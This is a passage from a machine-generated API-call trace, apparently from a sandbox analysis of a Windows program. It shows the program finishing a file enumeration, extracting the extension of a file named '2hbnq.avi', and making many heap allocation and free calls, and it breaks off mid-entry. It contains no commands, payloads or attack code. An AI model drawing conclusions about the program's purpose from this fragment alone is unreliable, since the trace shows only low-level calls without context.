ftCreationTime.dwLowDateTime=0xa8b24390, ftCreationTime.dwHighDateTime=0x1d5b968, ftLastAccessTime.dwLowDateTime=0x8e9c0710, ftLastAccessTime.dwHighDateTime=0x1d5c585, ftLastWriteTime.dwLowDateTime=0x1896e400, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14221, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="2hbnq.avi", cAlternateFileName="")) returned 0 [0041.746] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0041.746] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.747] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.747] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.747] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0041.748] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af468 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889c10 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.748] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.748] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.749] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.749] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.750] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.750] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.750] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.751] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.752] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.752] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0xab0028 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0041.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.754] HeapFree (in: 